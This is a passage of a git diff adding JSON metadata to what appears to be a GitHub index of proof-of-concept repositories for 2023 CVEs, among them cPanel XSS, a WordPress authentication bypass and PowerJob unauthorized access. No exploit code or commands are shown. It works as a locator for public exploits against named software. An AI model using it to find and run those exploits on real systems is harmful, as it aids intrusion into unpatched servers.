"CVE-2023-29489", + "full_name": "SynixCyberCrimeMy\/CVE-2023-29489", + "owner": { + "login": "SynixCyberCrimeMy", + "id": 151055664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151055664?v=4", + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy\/CVE-2023-29489", + "description": "SynixCyberCrimeMY CVE-2023-29489 Scanner By SamuraiMelayu1337 & h4zzzzzz@scc", + "fork": false, + "created_at": "2023-11-16T20:24:11Z", + "updated_at": "2023-11-16T20:25:12Z", + "pushed_at": "2023-11-16T20:30:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734955941, + "name": "Validate-CVE-2023-29489-scanner-", + "full_name": "Makurorororororororo\/Validate-CVE-2023-29489-scanner-", + "owner": { + "login": "Makurorororororororo", + "id": 110962804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110962804?v=4", + "html_url": "https:\/\/github.com\/Makurorororororororo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Makurorororororororo\/Validate-CVE-2023-29489-scanner-", + "description": null, + "fork": false, + "created_at": "2023-12-23T06:28:32Z", + "updated_at": "2024-06-07T07:44:55Z", + "pushed_at": "2023-12-23T06:35:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746343792, + "name": "tool-29489", + "full_name": "prasad-1808\/tool-29489", + "owner": { + "login": "prasad-1808", + "id": 86564180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86564180?v=4", + "html_url": "https:\/\/github.com\/prasad-1808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prasad-1808\/tool-29489", + "description": "This Tool is used to check for CVE-2023-29489 Vulnerability in the provided URL with the set of payloads available", + "fork": false, + "created_at": "2024-01-21T19:23:47Z", + "updated_at": "2024-01-21T19:38:23Z", + "pushed_at": "2024-01-21T20:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747385819, + "name": "cpanel_xss_2023", + "full_name": "mdaseem03\/cpanel_xss_2023", + "owner": { + "login": "mdaseem03", + "id": 98540960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98540960?v=4", + "html_url": "https:\/\/github.com\/mdaseem03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdaseem03\/cpanel_xss_2023", + "description": "cpanel_xss_2023 is a simple Python script designed for finding CVE-2023-29489 vulnerability in cpanel.", + "fork": false, + "created_at": "2024-01-23T20:29:57Z", + "updated_at": "2024-06-03T08:19:43Z", + "pushed_at": "2024-01-31T16:23:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786366131, + "name": "CVE-2023-29489", + "full_name": "some-man1\/CVE-2023-29489", + "owner": { + "login": "some-man1", + "id": 142589483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142589483?v=4", + "html_url": "https:\/\/github.com\/some-man1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/some-man1\/CVE-2023-29489", + "description": "# CVE-2023-29489 exploit", + "fork": false, + "created_at": "2024-04-14T08:29:22Z", + "updated_at": "2024-04-14T08:32:44Z", + "pushed_at": "2024-04-14T08:45:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cve", + "cve-2023-29489", + "exploit", + "priv8", + "python", + "python3", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789738179, + "name": "CVE-2023-29489", + "full_name": "Cappricio-Securities\/CVE-2023-29489", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-29489", + "description": "An issue was discovered in cPanel before 11.109.9999.116. Cross-Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.", + "fork": false, + "created_at": "2024-04-21T12:26:22Z", + "updated_at": "2024-06-21T07:23:23Z", + "pushed_at": "2024-06-21T07:23:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cve", + "cve-2023-29489", + "reflected-xss", + "xss", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 807997088, + "name": "CVE-2023-29489", + "full_name": "md-thalal\/CVE-2023-29489", + "owner": { + "login": "md-thalal", + "id": 171010055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171010055?v=4", + "html_url": "https:\/\/github.com\/md-thalal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/md-thalal\/CVE-2023-29489", + "description": "CVE-2023-29489 is a vulnerability to exploitable in cross-site scripting ( xss ) reflect the cpanel ", + "fork": false, + "created_at": "2024-05-30T07:20:09Z", + "updated_at": "2024-06-12T05:58:43Z", + "pushed_at": "2024-06-12T05:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cross-site-scripting", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2951.json b/2023/CVE-2023-2951.json new file mode 100644 index 0000000000..da1f874059 --- /dev/null +++ b/2023/CVE-2023-2951.json @@ -0,0 +1,33 @@ +[ + { + "id": 646213230, + "name": "CVE-2023-2951", + "full_name": "Spr1te76\/CVE-2023-2951", + "owner": { + "login": "Spr1te76", + "id": 106242212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106242212?v=4", + "html_url": "https:\/\/github.com\/Spr1te76", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Spr1te76\/CVE-2023-2951", + "description": null, + "fork": false, + "created_at": "2023-05-27T16:45:03Z", + "updated_at": "2024-03-09T10:38:51Z", + "pushed_at": "2023-05-28T12:12:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29808.json b/2023/CVE-2023-29808.json new file mode 100644 index 0000000000..596cbbbe69 --- /dev/null +++ b/2023/CVE-2023-29808.json @@ -0,0 +1,33 @@ +[ + { + "id": 635861076, + "name": "CVE-2023-29808", + "full_name": "zPrototype\/CVE-2023-29808", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29808", + "description": null, + "fork": false, + "created_at": "2023-05-03T15:56:04Z", + "updated_at": "2024-08-10T17:51:19Z", + "pushed_at": "2023-05-03T15:58:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29809.json b/2023/CVE-2023-29809.json new file mode 100644 index 0000000000..d23a0ba584 --- /dev/null +++ b/2023/CVE-2023-29809.json @@ -0,0 +1,33 @@ +[ + { + "id": 634655162, + "name": "CVE-2023-29809", + "full_name": "zPrototype\/CVE-2023-29809", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29809", + "description": null, + "fork": false, + "created_at": "2023-04-30T20:26:04Z", + "updated_at": "2023-05-24T20:21:46Z", + "pushed_at": "2023-04-30T20:28:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2982.json b/2023/CVE-2023-2982.json new file mode 100644 index 0000000000..eb518710bd --- /dev/null +++ b/2023/CVE-2023-2982.json @@ -0,0 +1,126 @@ +[ + { + "id": 660225162, + "name": "CVE-2023-2982", + "full_name": "RandomRobbieBF\/CVE-2023-2982", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2982", + "description": "WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass", + "fork": false, + "created_at": "2023-06-29T14:21:08Z", + "updated_at": "2024-09-28T09:51:29Z", + "pushed_at": "2023-07-06T08:14:17Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 81, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 660554853, + "name": "CVE-2023-2982-POC", + "full_name": "H4K6\/CVE-2023-2982-POC", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-2982-POC", + "description": "WordPress社交登录和注册(Discord,Google,Twitter,LinkedIn)<=7.6.4-绕过身份验证", + "fork": false, + "created_at": "2023-06-30T09:15:02Z", + "updated_at": "2024-10-29T18:27:48Z", + "pushed_at": "2023-07-07T14:22:49Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 663411527, + "name": "CVE-2023-2982", + "full_name": "LoaiEsam37\/CVE-2023-2982", + "owner": { + "login": "LoaiEsam37", + "id": 114489561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114489561?v=4", + "html_url": "https:\/\/github.com\/LoaiEsam37", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LoaiEsam37\/CVE-2023-2982", + "description": null, + "fork": false, + "created_at": "2023-07-07T08:25:38Z", + "updated_at": "2023-07-08T06:57:21Z", + "pushed_at": "2023-07-07T09:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720332712, + "name": "CVE-2023-2982", + "full_name": "wshinkle\/CVE-2023-2982", + "owner": { + "login": "wshinkle", + "id": 91923278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91923278?v=4", + "html_url": "https:\/\/github.com\/wshinkle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wshinkle\/CVE-2023-2982", + "description": null, + "fork": false, + "created_at": "2023-11-18T06:34:15Z", + "updated_at": "2023-11-18T06:44:45Z", + "pushed_at": "2023-11-18T06:44:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29839.json b/2023/CVE-2023-29839.json new file mode 100644 index 0000000000..a21000e074 --- /dev/null +++ b/2023/CVE-2023-29839.json @@ -0,0 +1,33 @@ +[ + { + "id": 635570742, + "name": "CVE-2023-29839", + "full_name": "jichngan\/CVE-2023-29839", + "owner": { + "login": "jichngan", + "id": 34933203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34933203?v=4", + "html_url": "https:\/\/github.com\/jichngan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jichngan\/CVE-2023-29839", + "description": "Hotel Druid 3.0.4 Stored Cross Site Scripting Vulnerability ", + "fork": false, + "created_at": "2023-05-03T01:31:31Z", + "updated_at": "2023-05-03T16:14:09Z", + "pushed_at": "2023-05-26T03:04:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2986.json b/2023/CVE-2023-2986.json new file mode 100644 index 0000000000..3a2b577b55 --- /dev/null +++ b/2023/CVE-2023-2986.json @@ -0,0 +1,73 @@ +[ + { + "id": 651640673, + "name": "CVE-2023-2986", + "full_name": "Ayantaker\/CVE-2023-2986", + "owner": { + "login": "Ayantaker", + "id": 38920001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38920001?v=4", + "html_url": "https:\/\/github.com\/Ayantaker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ayantaker\/CVE-2023-2986", + "description": "Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress", + "fork": false, + "created_at": "2023-06-09T17:44:09Z", + "updated_at": "2024-01-03T00:13:08Z", + "pushed_at": "2023-09-15T05:37:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abandoned-cart-lite", + "cve-2023-2986", + "exploit", + "php", + "proof-of-concept", + "vulnerability", + "woocommerce", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653318513, + "name": "CVE-2023-2986", + "full_name": "Alucard0x1\/CVE-2023-2986", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2023-2986", + "description": "Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress in Python Version", + "fork": false, + "created_at": "2023-06-13T20:35:03Z", + "updated_at": "2023-06-13T20:40:39Z", + "pushed_at": "2023-06-14T00:41:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29919.json b/2023/CVE-2023-29919.json new file mode 100644 index 0000000000..821cbe59dd --- /dev/null +++ b/2023/CVE-2023-29919.json @@ -0,0 +1,33 @@ +[ + { + "id": 642682480, + "name": "CVE-2023-29919", + "full_name": "xiaosed\/CVE-2023-29919", + "owner": { + "login": "xiaosed", + "id": 84080097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84080097?v=4", + "html_url": "https:\/\/github.com\/xiaosed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaosed\/CVE-2023-29919", + "description": null, + "fork": false, + "created_at": "2023-05-19T05:48:21Z", + "updated_at": "2023-05-19T05:48:21Z", + "pushed_at": "2023-05-19T06:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29922.json b/2023/CVE-2023-29922.json new file mode 100644 index 0000000000..7c5852ce45 --- /dev/null +++ b/2023/CVE-2023-29922.json @@ -0,0 +1,33 @@ +[ + { + "id": 702908363, + "name": "Powerjob-CVE-2023-29922-", + "full_name": "CN016\/Powerjob-CVE-2023-29922-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Powerjob-CVE-2023-29922-", + "description": "Powerjob 未授权访问漏洞(CVE-2023-29922)", + "fork": false, + "created_at": "2023-10-10T08:35:00Z", + "updated_at": "2023-10-10T08:41:21Z", + "pushed_at": "2023-10-10T08:41:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29923.json b/2023/CVE-2023-29923.json new file mode 100644 index 0000000000..d5a88a3420 --- /dev/null +++ b/2023/CVE-2023-29923.json @@ -0,0 +1,95 @@ +[ + { + "id": 644247652, + "name": "CVE-2023-29923", + "full_name": "1820112015\/CVE-2023-29923", + "owner": { + "login": "1820112015", + "id": 50662973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50662973?v=4", + "html_url": "https:\/\/github.com\/1820112015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1820112015\/CVE-2023-29923", + "description": "CVE-2023-29922 Batch detection script", + "fork": false, + "created_at": "2023-05-23T06:06:50Z", + "updated_at": "2024-08-10T17:53:39Z", + "pushed_at": "2023-05-23T06:48:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 645138371, + "name": "CVE-2023-29923-Scan", + "full_name": "3yujw7njai\/CVE-2023-29923-Scan", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-29923-Scan", + "description": "PowerJob <=4.3.2 未授权访问漏洞检测工具(CVE-2023-29922)", + "fork": false, + "created_at": "2023-05-25T02:24:51Z", + "updated_at": "2023-06-14T18:08:40Z", + "pushed_at": "2023-05-25T02:25:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646689306, + "name": "CVE-2023-29923", + "full_name": "Le1a\/CVE-2023-29923", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-29923", + "description": "PowerJob V4.3.1 Unauthorized Vulnerability Exploit", + "fork": false, + "created_at": "2023-05-29T05:48:35Z", + "updated_at": "2023-06-20T08:27:03Z", + "pushed_at": "2023-05-29T05:51:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29929.json b/2023/CVE-2023-29929.json new file mode 100644 index 0000000000..78fda42b41 --- /dev/null +++ b/2023/CVE-2023-29929.json @@ -0,0 +1,33 @@ +[ + { + "id": 627966808, + "name": "CVE-2023-29929", + "full_name": "YSaxon\/CVE-2023-29929", + "owner": { + "login": "YSaxon", + "id": 11711101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11711101?v=4", + "html_url": "https:\/\/github.com\/YSaxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YSaxon\/CVE-2023-29929", + "description": null, + "fork": false, + "created_at": "2023-04-14T15:41:12Z", + "updated_at": "2024-08-22T21:06:49Z", + "pushed_at": "2024-08-22T21:05:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29930.json b/2023/CVE-2023-29930.json new file mode 100644 index 0000000000..5009380279 --- /dev/null +++ b/2023/CVE-2023-29930.json @@ -0,0 +1,33 @@ +[ + { + "id": 382216567, + "name": "TFTPlunder", + "full_name": "YSaxon\/TFTPlunder", + "owner": { + "login": "YSaxon", + "id": 11711101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11711101?v=4", + "html_url": "https:\/\/github.com\/YSaxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YSaxon\/TFTPlunder", + "description": "Info and exploit for CVE-2023-29930: blind file read\/write in Genesys TFTP provisioning server configuration", + "fork": false, + "created_at": "2021-07-02T03:10:53Z", + "updated_at": "2024-03-01T03:52:43Z", + "pushed_at": "2023-05-09T16:50:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29983.json b/2023/CVE-2023-29983.json new file mode 100644 index 0000000000..a780550a0a --- /dev/null +++ b/2023/CVE-2023-29983.json @@ -0,0 +1,33 @@ +[ + { + "id": 634374104, + "name": "CVE-2023-29983", + "full_name": "zPrototype\/CVE-2023-29983", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29983", + "description": null, + "fork": false, + "created_at": "2023-04-29T22:52:03Z", + "updated_at": "2023-04-30T21:43:15Z", + "pushed_at": "2023-04-30T15:43:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30033.json b/2023/CVE-2023-30033.json new file mode 100644 index 0000000000..2666d710b0 --- /dev/null +++ b/2023/CVE-2023-30033.json @@ -0,0 +1,33 @@ +[ + { + "id": 709099001, + "name": "CVE-2023-30033", + "full_name": "phucodeexp\/CVE-2023-30033", + "owner": { + "login": "phucodeexp", + "id": 148666067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148666067?v=4", + "html_url": "https:\/\/github.com\/phucodeexp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phucodeexp\/CVE-2023-30033", + "description": null, + "fork": false, + "created_at": "2023-10-24T02:23:03Z", + "updated_at": "2023-10-24T02:27:13Z", + "pushed_at": "2023-10-24T02:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-3009.json b/2023/CVE-2023-3009.json new file mode 100644 index 0000000000..1f0456d54a --- /dev/null +++ b/2023/CVE-2023-3009.json @@ -0,0 +1,33 @@ +[ + { + "id": 647841029, + "name": "CVE-2023-3009", + "full_name": "mnqazi\/CVE-2023-3009", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-3009", + "description": "Stored XSS vulnerability in Teampass < 3.0.9 (Bypass of CVE-2023–2516) — M Nadeem Qazi ", + "fork": false, + "created_at": "2023-05-31T16:23:23Z", + "updated_at": "2023-06-01T12:29:55Z", + "pushed_at": "2023-05-31T16:31:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30092.json b/2023/CVE-2023-30092.json new file mode 100644 index 0000000000..f71d59278d --- /dev/null +++ b/2023/CVE-2023-30092.json @@ -0,0 +1,33 @@ +[ + { + "id": 637649717, + "name": "CVE-2023-30092", + "full_name": "nawed20002\/CVE-2023-30092", + "owner": { + "login": "nawed20002", + "id": 98532470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98532470?v=4", + "html_url": "https:\/\/github.com\/nawed20002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nawed20002\/CVE-2023-30092", + "description": null, + "fork": false, + "created_at": "2023-05-08T05:55:31Z", + "updated_at": "2023-05-08T05:59:36Z", + "pushed_at": "2023-05-10T07:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30145.json b/2023/CVE-2023-30145.json new file mode 100644 index 0000000000..ae9f5fc99e --- /dev/null +++ b/2023/CVE-2023-30145.json @@ -0,0 +1,33 @@ +[ + { + "id": 645337610, + "name": "CVE-2023-30145", + "full_name": "paragbagul111\/CVE-2023-30145", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2023-30145", + "description": "Camaleon CMS v2.7.0 contain a Server-Side Template Injection (SSTI) vulnerability ", + "fork": false, + "created_at": "2023-05-25T12:35:27Z", + "updated_at": "2024-08-10T17:54:07Z", + "pushed_at": "2023-05-26T12:07:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30146.json b/2023/CVE-2023-30146.json new file mode 100644 index 0000000000..43a8f3f2d6 --- /dev/null +++ b/2023/CVE-2023-30146.json @@ -0,0 +1,38 @@ +[ + { + "id": 651201551, + "name": "CVE-2023-30146", + "full_name": "L1-0\/CVE-2023-30146", + "owner": { + "login": "L1-0", + "id": 123986259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123986259?v=4", + "html_url": "https:\/\/github.com\/L1-0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L1-0\/CVE-2023-30146", + "description": "Some Assmann manufactured IP-Cams leak the administrator password in their backup. ", + "fork": false, + "created_at": "2023-06-08T18:18:47Z", + "updated_at": "2024-10-09T11:21:33Z", + "pushed_at": "2023-08-03T11:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, 